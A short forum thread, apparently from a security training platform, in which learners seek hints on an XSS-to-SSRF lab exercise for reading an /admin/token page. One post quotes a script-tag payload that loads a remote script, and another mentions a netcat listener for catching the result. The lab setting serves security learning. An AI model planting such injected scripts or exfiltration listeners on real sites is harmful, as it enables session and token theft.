Forum Discussion

Bronze I

10 months ago

Solved

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

help & support

CyberSharpe
9 months ago
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.

me5382

Bronze I

10 months ago

I am also having problems on this lesson. So far I haven't been able to get the site to execute any new code

I tried running the hint from below as well as the following:

<script src="http://0.0.0.0:8080/script.js"></script>

My console just converts it to a string and does not actually call into the <script>. (notice how the question field is a string).

I am sure I must be misunderstanding something, any help would be appreciated.

KieranRowley
Community Manager
10 months ago
shubham I wondered if you had any hints for me5382

Forum Discussion

Cross-Site Scripting: Ep.6 – Further Exploitation

Featured Places

Help & Support Forum

Related Content

Re: Cross-Site Scripting: Ep.6 – Further Exploitation

Pen Test CTFs: Jinja2 Exploitation

Human Connection Challenge: Season 1 – Web Exploitation - XSS

Zeek Ep 4 Scripting

Fundamental AI Algorithms: Decision Trees Script Detection Question 6

Recent Discussions

Help with Introduction to Python Scripting: Ep.7 – Demonstrate Your Skills

Privilege Escalation: Windows – Finding Passwords

Microsoft Defender for Cloud: Inventory, Resource Health and Recommendations.

Malware Analysis: Shlayer

CSP Hash Incorrect Despite Correct Script and Hash (CSP Lab Issue?)